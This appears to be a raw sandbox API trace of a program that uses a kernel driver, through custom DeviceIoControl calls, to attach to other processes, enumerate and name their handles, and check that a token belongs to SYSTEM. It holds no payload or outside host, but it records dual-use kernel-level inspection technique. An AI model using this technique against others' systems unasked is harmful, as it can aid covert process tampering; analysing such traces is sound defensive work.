0x0 [0264.851] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.851] ObReferenceObjectByHandle (in: Handle=0x318, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bbe090, HandleInformation=0x0) returned 0x0 [0264.851] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.851] PsReleaseProcessExitSynchronization () returned 0x2 [0264.851] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x4816d [0264.851] ObQueryNameString (in: Object=0xffffe00069bbe090, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.851] ObfDereferenceObject (Object=0xffffe00069bbe090) returned 0x7ff5 [0264.851] IoCompleteRequest () returned 0x0 [0264.851] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.851] PsAcquireProcessExitSynchronization () returned 0x0 [0264.851] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.851] ObReferenceObjectByHandle (in: Handle=0x330, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698ca920, HandleInformation=0x0) returned 0x0 [0264.851] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.851] PsReleaseProcessExitSynchronization () returned 0x2 [0264.851] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x4816c [0264.851] ObQueryNameString (in: Object=0xffffe000698ca920, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.851] ObfDereferenceObject (Object=0xffffe000698ca920) returned 0x7ff3 [0264.851] IoCompleteRequest () returned 0x0 [0264.851] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.851] PsAcquireProcessExitSynchronization () returned 0x0 [0264.851] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.851] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bc4920, HandleInformation=0x0) returned 0x0 [0264.851] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.851] PsReleaseProcessExitSynchronization () returned 0x2 [0264.851] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x4816b [0264.851] ObQueryNameString (in: Object=0xffffe00069bc4920, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.851] ObfDereferenceObject (Object=0xffffe00069bc4920) returned 0x7ffe [0264.851] IoCompleteRequest () returned 0x0 [0264.852] PsLookupProcessByProcessId (in: ProcessId=0x1e4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.852] PsAcquireProcessExitSynchronization () returned 0x0 [0264.852] KeStackAttachProcess (in: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ed1080, ApcState=0xffffd000b1b8e400) [0264.852] ObReferenceObjectByHandle (in: Handle=0x348, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bc4f20, HandleInformation=0x0) returned 0x0 [0264.852] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.852] PsReleaseProcessExitSynchronization () returned 0x2 [0264.852] ObfDereferenceObject (Object=0xffffe00067ed1080) returned 0x4816a [0264.852] ObQueryNameString (in: Object=0xffffe00069bc4f20, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.852] ObfDereferenceObject (Object=0xffffe00069bc4f20) returned 0x7ffe [0264.852] IoCompleteRequest () returned 0x0 [0264.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x180 [0264.852] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0264.852] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00067eca080, HandleInformation=0x0) returned 0x0 [0264.852] ObOpenObjectByPointer (in: Object=0xffffe00067eca080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.852] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x67d2e [0264.852] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a921e00 | out: TokenHandle=0xffffe0006a921e00*=0x1a8) returned 0x0 [0264.852] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.852] IoCompleteRequest () returned 0x0 [0264.852] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.852] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.853] CloseHandle (hObject=0x1a8) returned 1 [0264.853] CloseHandle (hObject=0x180) returned 1 [0264.853] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.853] PsAcquireProcessExitSynchronization () returned 0x0 [0264.853] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.853] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067edead0, HandleInformation=0x0) returned 0x0 [0264.853] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.853] PsReleaseProcessExitSynchronization () returned 0x2 [0264.853] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd2c [0264.853] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.853] ObfDereferenceObject (Object=0xffffe00067edead0) returned 0x7fff [0264.853] IoCompleteRequest () returned 0x0 [0264.853] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.853] PsAcquireProcessExitSynchronization () returned 0x0 [0264.853] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.853] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069585e70, HandleInformation=0x0) returned 0x0 [0264.853] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.854] PsReleaseProcessExitSynchronization () returned 0x2 [0264.854] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd2b [0264.854] ObQueryNameString (in: Object=0xffffe00069585e70, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.854] ObfDereferenceObject (Object=0xffffe00069585e70) returned 0x8000 [0264.854] IoCompleteRequest () returned 0x0 [0264.854] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.854] PsAcquireProcessExitSynchronization () returned 0x0 [0264.854] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.854] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067e98a40, HandleInformation=0x0) returned 0x0 [0264.854] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.854] PsReleaseProcessExitSynchronization () returned 0x2 [0264.854] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd2a [0264.854] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.854] ObfDereferenceObject (Object=0xffffe00067e98a40) returned 0x7e0c [0264.854] IoCompleteRequest () returned 0x0 [0264.854] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.854] PsAcquireProcessExitSynchronization () returned 0x0 [0264.854] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.854] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001480f6080, HandleInformation=0x0) returned 0x0 [0264.854] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.854] PsReleaseProcessExitSynchronization () returned 0x2 [0264.854] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd29 [0264.854] ObQueryNameString (in: Object=0xffffc001480f6080, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.854] ObfDereferenceObject (Object=0xffffc001480f6080) returned 0x8000 [0264.854] IoCompleteRequest () returned 0x0 [0264.854] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.854] PsAcquireProcessExitSynchronization () returned 0x0 [0264.854] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.854] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069585a40, HandleInformation=0x0) returned 0x0 [0264.854] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.854] PsReleaseProcessExitSynchronization () returned 0x2 [0264.854] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd28 [0264.854] ObQueryNameString (in: Object=0xffffe00069585a40, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.854] ObfDereferenceObject (Object=0xffffe00069585a40) returned 0x800e [0264.854] IoCompleteRequest () returned 0x0 [0264.854] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.854] PsAcquireProcessExitSynchronization () returned 0x0 [0264.854] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.854] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067eae690, HandleInformation=0x0) returned 0x0 [0264.854] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.854] PsReleaseProcessExitSynchronization () returned 0x2 [0264.854] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd27 [0264.854] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.854] ObfDereferenceObject (Object=0xffffe00067eae690) returned 0x7ffc [0264.855] IoCompleteRequest () returned 0x0 [0264.855] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.855] PsAcquireProcessExitSynchronization () returned 0x0 [0264.855] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.855] ObReferenceObjectByHandle (in: Handle=0x250, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014812f7c0, HandleInformation=0x0) returned 0x0 [0264.855] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.855] PsReleaseProcessExitSynchronization () returned 0x2 [0264.855] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd26 [0264.855] ObQueryNameString (in: Object=0xffffc0014812f7c0, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.855] ObfDereferenceObject (Object=0xffffc0014812f7c0) returned 0x8000 [0264.855] IoCompleteRequest () returned 0x0 [0264.855] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.855] PsAcquireProcessExitSynchronization () returned 0x0 [0264.855] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.855] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696b9940, HandleInformation=0x0) returned 0x0 [0264.855] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.855] PsReleaseProcessExitSynchronization () returned 0x2 [0264.855] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd25 [0264.855] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.855] ObfDereferenceObject (Object=0xffffe000696b9940) returned 0x7ffe [0264.855] IoCompleteRequest () returned 0x0 [0264.855] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.855] PsAcquireProcessExitSynchronization () returned 0x0 [0264.855] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.855] ObReferenceObjectByHandle (in: Handle=0x548, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696ba590, HandleInformation=0x0) returned 0x0 [0264.855] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.855] PsReleaseProcessExitSynchronization () returned 0x2 [0264.855] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd24 [0264.855] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.855] ObfDereferenceObject (Object=0xffffe000696ba590) returned 0x8000 [0264.855] IoCompleteRequest () returned 0x0 [0264.856] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.856] PsAcquireProcessExitSynchronization () returned 0x0 [0264.856] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.856] ObReferenceObjectByHandle (in: Handle=0x54c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696ba420, HandleInformation=0x0) returned 0x0 [0264.856] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.856] PsReleaseProcessExitSynchronization () returned 0x2 [0264.856] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd23 [0264.856] ObQueryNameString (in: Object=0xffffe000696ba420, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.856] ObfDereferenceObject (Object=0xffffe000696ba420) returned 0x7fbf [0264.856] IoCompleteRequest () returned 0x0 [0264.856] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.856] PsAcquireProcessExitSynchronization () returned 0x0 [0264.856] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.856] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696ba2b0, HandleInformation=0x0) returned 0x0 [0264.856] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.856] PsReleaseProcessExitSynchronization () returned 0x2 [0264.856] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd22 [0264.856] ObQueryNameString (in: Object=0xffffe000696ba2b0, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.856] ObfDereferenceObject (Object=0xffffe000696ba2b0) returned 0x7fd4 [0264.856] IoCompleteRequest () returned 0x0 [0264.856] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.856] PsAcquireProcessExitSynchronization () returned 0x0 [0264.856] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.856] ObReferenceObjectByHandle (in: Handle=0x5f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696bb4e0, HandleInformation=0x0) returned 0x0 [0264.856] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.856] PsReleaseProcessExitSynchronization () returned 0x2 [0264.856] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd21 [0264.856] ObQueryNameString (in: Object=0xffffe000696bb4e0, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.856] ObfDereferenceObject (Object=0xffffe000696bb4e0) returned 0x7cb6 [0264.856] IoCompleteRequest () returned 0x0 [0264.856] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.856] PsAcquireProcessExitSynchronization () returned 0x0 [0264.856] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.856] ObReferenceObjectByHandle (in: Handle=0x5f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000696b64b0, HandleInformation=0x0) returned 0x0 [0264.856] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.856] PsReleaseProcessExitSynchronization () returned 0x2 [0264.856] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd20 [0264.856] ObQueryNameString (in: Object=0xffffe000696b64b0, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.856] ObfDereferenceObject (Object=0xffffe000696b64b0) returned 0x7fff [0264.856] IoCompleteRequest () returned 0x0 [0264.856] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.856] PsAcquireProcessExitSynchronization () returned 0x0 [0264.856] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.857] ObReferenceObjectByHandle (in: Handle=0x748, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697f0330, HandleInformation=0x0) returned 0x0 [0264.857] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.857] PsReleaseProcessExitSynchronization () returned 0x2 [0264.857] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd1f [0264.857] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.857] ObfDereferenceObject (Object=0xffffe000697f0330) returned 0x7fe8 [0264.857] IoCompleteRequest () returned 0x0 [0264.857] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.857] PsAcquireProcessExitSynchronization () returned 0x0 [0264.857] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.857] ObReferenceObjectByHandle (in: Handle=0x834, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006996a970, HandleInformation=0x0) returned 0x0 [0264.857] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.857] PsReleaseProcessExitSynchronization () returned 0x2 [0264.857] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd1e [0264.857] ObQueryNameString (in: Object=0xffffe0006996a970, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.857] ObfDereferenceObject (Object=0xffffe0006996a970) returned 0x7fff [0264.857] IoCompleteRequest () returned 0x0 [0264.857] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.857] PsAcquireProcessExitSynchronization () returned 0x0 [0264.857] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.857] ObReferenceObjectByHandle (in: Handle=0x8bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a3eba0, HandleInformation=0x0) returned 0x0 [0264.857] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.857] PsReleaseProcessExitSynchronization () returned 0x2 [0264.857] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd1d [0264.857] ObQueryNameString (in: Object=0xffffe00069a3eba0, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.857] ObfDereferenceObject (Object=0xffffe00069a3eba0) returned 0x7fd4 [0264.857] IoCompleteRequest () returned 0x0 [0264.857] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.857] PsAcquireProcessExitSynchronization () returned 0x0 [0264.857] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.857] ObReferenceObjectByHandle (in: Handle=0x8f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069aac440, HandleInformation=0x0) returned 0x0 [0264.857] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.857] PsReleaseProcessExitSynchronization () returned 0x2 [0264.857] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd1c [0264.857] ObQueryNameString (in: Object=0xffffe00069aac440, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.857] ObfDereferenceObject (Object=0xffffe00069aac440) returned 0x7ffe [0264.857] IoCompleteRequest () returned 0x0 [0264.857] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.857] PsAcquireProcessExitSynchronization () returned 0x0 [0264.857] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000b1b8e400) [0264.857] ObReferenceObjectByHandle (in: Handle=0xae4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b7bd80, HandleInformation=0x0) returned 0x0 [0264.857] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.857] 